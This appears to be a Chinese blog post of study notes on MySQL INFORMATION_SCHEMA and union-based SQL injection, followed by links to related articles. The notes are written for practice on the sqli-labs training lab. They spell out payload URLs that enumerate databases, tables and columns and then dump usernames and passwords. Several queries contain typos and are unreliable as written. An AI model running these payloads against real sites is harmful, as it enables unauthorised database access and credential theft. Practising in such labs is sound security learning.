MySQL 相关知识

在MySQL中,把【INFORMATION_SCHEMA】 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

在 【INFORMATION_SCHEMA 】中,有数个 只读 表。它们实际上是 视图 ,而不是基本表,因此,你将无法看到与之相关的任何文件。

获取所有表结构(TABLES)

SELECT  *  FROM  information_schema.TABLES  WHERE  TABLE_SCHEMA='数据库名';  TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。

例如:列出test数据库中所有的表名,类型(普通表还是view)和使用的引擎

select table_name, table_type, engine

FROM information_schema.tables

WHERE table_schema = 'test'

ORDER BY table_name DESC;

解释: 对表的meta data的查询需要使用information_schema.tables, table_schema是数据库的名称,table_name是具体的表名,table_type指的是表的类型

concat()函数

功能:将多个字符串连接成一个字符串。

语法:concat(str1, str2,...)

返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。

1:select concat (id, name, score) as info from student;

返回的结果就是   1小明79

若是嫌格式数据显示不够清楚,可以加 ‘-’

select concat (id, '-',name, '-', score) as info from student;

返回的结果就是   1-小明-79

Group_coucat功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果

例:select name, group_concat (id) from student  group by name;

小明 | 1,5,6

小丽 | 2,4

小伟 | 3

小红 | 7

这样就使用group_concat()和group by显示相同名字的人的id号

4.接着使用order by 语句判断,该表中一共有几列数据

order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。

5.将id=1改为一个数据库不存在的id值,如861,使用union select 1,2,3联合查询语句查看页面是否有显示位。

发现页面先输出了2和3,说明页面有2个显示位

6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息

http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+   这是一个查询数据库名信息的语句

7.查询security内的所有表名http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

8.接着使用下面的语句爆破出列名

select group_concat(column_name) from information_schema.columns where table_name='users'

9.接着使用如下语句查询所有的用户名,密码   lesect group_concat(password) from security.users

注入大体流程

SELECT * FROM users WHERE id='-1' and 1=2'

思路就是 :先得判断是不是存在注入,然后判断是存在什么类型的注入,是字符型的还是数字型的,然后构造语句,先判断字段长度,然后通过插入语句database() 爆数据库名称,然后通过information_schema.tables 里面的table_schema=database()爆表名,然后通过infoemation_schema 爆字段名 然后在查字段中的内容

http://hefdfssdf:asp?id= 1  返回正常

如果返回正常的话,我们可以假设数据库执行了这条语句select * from user where id = 1

http://hefdfssdf:asp?id= 1' 加引号报错,可能存在注入

http://hefdfssdf:asp?id= 1 and 1=1

select * from user where id  = 1 and 1 =1

如果and 1=1 报错了,那么就可能是

select * from user where id  ='1         and         1=1 '

select * from user where id  = '1'       and        '1' = '1'

select * from user where id  = '1'       and        '1' = '2'

假设说,确定了是数字型注入,那么开始判断字段长度,一共有几个字段

、用order by 判断

select * from user where id  = 1 order by 2  没报错

select * from user where id  = 1 order by 3  也没报错

select * from user where id  = 1 order by 4  也没报错

select * from user where id  = 1  order by 5 报错了,说明存在3个字段

判断出来了字段数,然后使用联合查询  看看哪些字段可以利用

http://hefdfssdf:asp?id = 1  union select 1,2,3,4

然后爆出来 两个 2和3 出现问题 了

、爆数据库名

然后就想查什么就查什么

就比如先查数据库名,查完数据库名查表名,在查字段,字段名说白了就是列名

http://hefdfssdf:asp?id  =- 1  union select  1,database(),version() 4

这个时候页面上已经爆出来数据库名字了,比如说数据库名字是aaa,然后根据数据库名字查询

三、爆表名

http://hefdfssdf:asp?id  = -1  union select 1 ,2,group_concat(table_name) ,4 from infoemation_schema.tables   where table_schema=database()   database()这里换成上面查出来的数据库的名称也就是 aaa

然后显示出此数据库下面的所有表名,比如说,查出来表名字是 bbb

limit 0,1, 从你的表中的第0个数据开始,只读取一个,这样查出来的就是第一个数据库 ,再用一遍limit 1,1,就能查出来第二个数据库

四、爆字段名

http://hefdfssdf:asp?id  = -1 union select 1,2,column_name ,4 from information_schema  where table_schema = ‘aaa’  and  table_name = ‘bbb’ limit 0,1 --+

table_shame 填写的是刚才爆出来的数据库名字,table_name 填写的是刚刚爆出来的表名

同理,假如说爆出来 俩字段,一个是user,另一个是password

五、爆字段中的内容

接着查询aaa数据库中bbb表中user和password中的内容

http://hefdfssdf:asp?id = -1 union select 1,2,concat(usre,’-’,password ),4 from aaa.bbb limit0,1 --+

就能爆出来用户名和密码  例如  admin – 12345

这里的concat()函数,详见下面说明,(user, ’-’ ,password)中间加了个’-’是为了好区分

SQL注入练习第一天的更多相关文章

  1. SQL注入平台第一关,注入?id=1'不报错的问题

    第一关需要在地址栏输入id参数测试是否有注入点 我这里输入 http://localhost/sqli-labs-master/Less-1/?id=1 下一步将id参数改为?id=1' http:/ ...

  2. SQL注入自学[第一学:一个简单的注入环境的编写]

    /* 转载请注明出处 ID:珍惜少年时 */ CODE区域: /*注:现在mysql_connect的这种连接方式已经被放弃了,也就是说不用了,老夫也是新手上路故,下载了一个wampserver2.2 ...

  3. 【sql注入】浅谈JSP安全开发之SQL注入

    [sql注入]浅谈JSP安全开发之SQL注入 本文转自:i春秋社区 前言不管是用什么语言编写WEB应用程序,他们都或多或少有一些地方存在漏洞.如果你想知道漏洞的运行原理,和防御方案,那么请看完本篇文章 ...

  4. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  5. 第一次MySQL的SQL注入实验

    测试平台:https://www.mozhe.cn/news/detail/324 上完SQL注入的第一节课过来对着笔记一步一步来做.. 1.首页面上没有id=XXX的东西,看见“平台维护通知”,点开 ...

  6. 什么是SQL注入漏洞?

    什么是SQL注入: SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL. SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字 ...

  7. SQL注入之Sqli-labs系列第一篇

    在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sq ...

  8. SQL注入之Sqli-labs系列第一关

    在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sq ...

  9. web安全之SQL注入--第一章 课程介绍

    课程介绍1.什么是SQL注入?2.如何寻找SQL注入漏洞?3.如何进行sql注入攻击?4.如何预防sql注入5.课程总结

随机推荐

  1. EasyRecovery——信息时代的“后悔药”

    前几日,小编在豆瓣潜水的时候看到这么一个帖子,说是一对小情侣吵架,女方一气之下把男方的博士论文和资料全删了,求一个办法让男友消气. 站在吃瓜的角度,小编和广大群众看法一致,希望两人直接分手,放男方一条 ...

  2. 【PYTEST】第二章编写测试函数

    知识点: assert 测试函数标记 跳过测试 标记预期失败的测试用例 1. asseet 返回的都是布尔值,等于False(F) 就是失败, assert 有很多 assert something ...

  3. iOS 搜索条使用详解

    在ios开发中搜索条的使用挺常见的,不过之前一直没用到也没细细研究,最近做外包项目的时候刚好用到,在这里记录一下使用的过程,只要理解了原理,其实还是比较简单的!上传的图片有点大,刚好可以看清楚它的使用 ...

  4. Java 在Excel中添加分离型饼图、环形图

    一.概述 Excel中可支持多种不同类型的图表,本文介绍如何绘制分离型饼图和环形图.其中,分离型饼图的绘制可分为整体分离型(即设置饼图分离程度)和局部分离(即设置点爆炸型值)两种情况.下面将以Java ...

  5. 【DKNN】Distilling the Knowledge in a Neural Network 第一次提出神经网络的知识蒸馏概念

    原文链接 小样本学习与智能前沿 . 在这个公众号后台回复"DKNN",即可获得课件电子资源. 文章已经表明,对于将知识从整体模型或高度正则化的大型模型转换为较小的蒸馏模型,蒸馏非常 ...

  6. JZOJ 11.28 提高B组反思

    JZOJ 11.28 提高B组反思 被打崩了呀 下次打提高A去了(逃 T1 刚开始没有读懂题,后来读懂了以后没有思路.没有想到是一个构造题,对同构的性质没有了解清楚,题解也讲的不明不白,懵-- T2 ...

  7. lcm的和(莫比乌斯反演)

    马上开学了,加一个操作系统和数据库标签 不玩了,求1-n和1-m的lcm(i,j)和 首先想到把lcm(i,j)转化为i * j / gcd(i, j) 然后gcd,要素察觉,开始枚举d使得gcd(i ...

  8. 第11.2节 Python 正则表达式支持函数概览

    为了大家熟悉re模块匹配文本的处理,本节将概要介绍与此处理有关的几个主要函数,提供了如下主要函数: 以上函数中的部分的三个重要参数说明如下: pattern都是代表匹配规则的模式字符串,string代 ...

  9. element ui的el-radio踩坑

    1.html 1 <div class="listPeopleDetail"> 2 <div class="item" v-for=" ...

  10. 推荐系统实践 0x0d GBDT+LR

    前一篇文章我们介绍了LR->FM->FFM的整个演化过程,我们也知道,效果最好的FFM,它的计算复杂度已经达到了令人发指的\(n^2k\).其实就是这样,希望提高特征交叉的维度来弥补稀疏特 ...